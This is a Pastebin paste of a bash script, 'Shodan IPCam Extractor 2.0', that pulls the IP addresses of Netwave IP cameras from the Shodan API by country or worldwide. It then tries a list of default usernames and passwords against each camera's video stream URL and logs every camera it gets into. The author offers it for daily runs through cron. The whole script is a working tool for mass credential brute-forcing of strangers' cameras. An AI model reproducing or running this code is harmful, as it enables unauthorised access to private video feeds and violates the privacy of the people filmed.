Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- #
- # Shodan IPCam Extractor 2.0 by Arsouill3 @ 8ch.net/ipcam/
- #
- # Last update : 31/10/2015
- #
- # Shodan IPCam Extractor 2.0 allows you to download IP (of IPCam) from Shodan.io, thanks to its API, and to test default credentials. Then all exploitable IPCam are saved in bruteforce.log.
- # For that purpose, you'll need to subscribe either Developer or Freelancer plan (https://developer.shodan.io/billing/signup).
- # cURL (http://curl.haxx.se/download.html) and jq (https://stedolan.github.io/jq/download/) are required.
- # The script has been written to get all IP (of IPCam) all over the world on a daily basis. If you want to do so, then edit crontab (crontab -e) as follow : * 20 * * * PATH/shodan_ipcam_extractor.sh $country_iso_2letters $date (script will be launched #everyday at 8 p.m.)
- # A sample of credentials.txt here : http://pastebin.com/NmQQ6w37
- #
- # ./shodan_ipcam_extractor.sh $country_iso_2letters $date :
- # * $country_iso_2letters : Alpha-2 code of a country (https://www.iso.org/obp/ui/#search) | all
- # * $date : all | y (stands for yesterday)
- api_key="" # Paste your Shodan's API key here
- country=$1
- date=$2
- today=$(date +'%s')
- shodan_today=$(date --date="@$today" "+%d/%m/%Y")
- yesterday=$(($today-24*3600))
- bfyesterday=$(($yesterday-24*3600))
- shodan_bfyesterday=$(date --date="@$bfyesterday" "+%d/%m/%Y")
- query1="netwave ip camera country:$country before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam of $country posted on yesterday ; $country!=all and $date=y
- query2="netwave ip camera country:$country" # Download all IPCam of $country ; $country!=all and $date=all
- query3="netwave ip camera" # Download all IPCam ; $country=all and $date=all
- query4="netwave ip camera before:$shodan_today after:$shodan_bfyesterday" # Download all IPCam posted yesterday ; $country=all and $date=y
- if [ ! -d "./JSON_files" ]
- then
- mkdir "./JSON_files"
- fi
- if [ ! -f "./shodan_ip.txt" ]
- then
- touch "./shodan_ip.txt"
- fi
- function collect_ip { # collect_ip $api_key $query
- i=1
- nbr_ip=1
- while [ "$nbr_ip" -gt "0" ]
- do
- code_status=$(curl -L -w "%{http_code}" "https://api.shodan.io/shodan/host/search?key=$1&query=$2&page=$i" -o ./JSON_files/shodan_$i.json)
- if [ "$code_status" -ne "200" ]
- then
- echo "Error ! Maybe a lack of credit ? $(date "+%c")" >> ./error_shodan.log
- nbr_ip=0
- i=$(($i+1))
- else
- nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$i.json)
- i=$(($i+1))
- fi
- done
- i=$(($i-1))
- rm "./JSON_files/shodan_$i.json"
- }
- function extract_ip {
- nbr_files=$(ls ./JSON_files/ | wc -l)
- if [ "$nbr_files" -gt "0" ]
- then
- for (( j=1; $j<=$nbr_files; j++ ))
- do
- nbr_ip=$(jq '.matches | length' < ./JSON_files/shodan_$j.json)
- for (( i=0; $i<=$nbr_ip-1; i++ ))
- do
- ip=$(jq --raw-output .matches[$i].ip_str < ./JSON_files/shodan_$j.json)
- printf "%s\n" "$ip" >> ./shodan_ip.txt
- done
- rm "./JSON_files/shodan_$j.json"
- echo "File $j processed."
- done
- else
- echo "JSON_files directory is empty !"
- exit
- fi
- # Split shodan_ip.txt into files of 4000 lines max each
- nbr_line_ip=$(wc -l ./shodan_ip.txt | sed 's/^\(.*\) \..*/\1/')
- split=$(($nbr_line_ip/4000)) # 4000 is nearly the max quantity of IP to prevent Joe's FileDownloader of crashing...
- for (( i=1; $i<=$split; i++ ))
- do
- j=$((4000*$i-3999))
- k=$((4000*$i))
- sed -n -e $j,$k'p' ./shodan_ip.txt > ./shodan_ip_$i.txt
- done
- sed -n -e $(($k+1)),'$p' ./shodan_ip.txt > ./shodan_ip_$i.txt
- }
- # Beginning of "main"
- if [ "$country" = "all" ]
- then
- if [ "$date" = "all" ]
- then
- collect_ip $api_key $query3
- extract_ip
- else
- collect_ip $api_key $query4
- extract_ip
- fi
- else
- if [ "$date" = "y" ]
- then
- collect_ip $api_key $query1
- extract_ip
- else
- collect_ip $api_key $query2
- extract_ip
- fi
- fi
- # Try all credentials of crendentials.txt. They should imperatively be of the form admin:psw (no spaces, one per line). A sample here : http://pastebin.com/NmQQ6w37
- while read ip
- do
- while read credential
- do
- admin=$(echo $credential | sed 's/^\(.*\):.*$/\1/')
- psw=$(echo $credential | sed 's/^.*:\(.*\)$/\1/')
- code_status=$(curl -sL -m 10 -w "%{http_code}" "http://$ip/videostream.cgi?user=$admin&pwd=$psw" -o /dev/null)
- if [ "$code_status" = "200" ]
- then
- echo "http://$ip/ - $admin:$psw" >> ./bruteforce.log
- fi
- done < ./credentials.txt
- done < ./shodan_ip.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement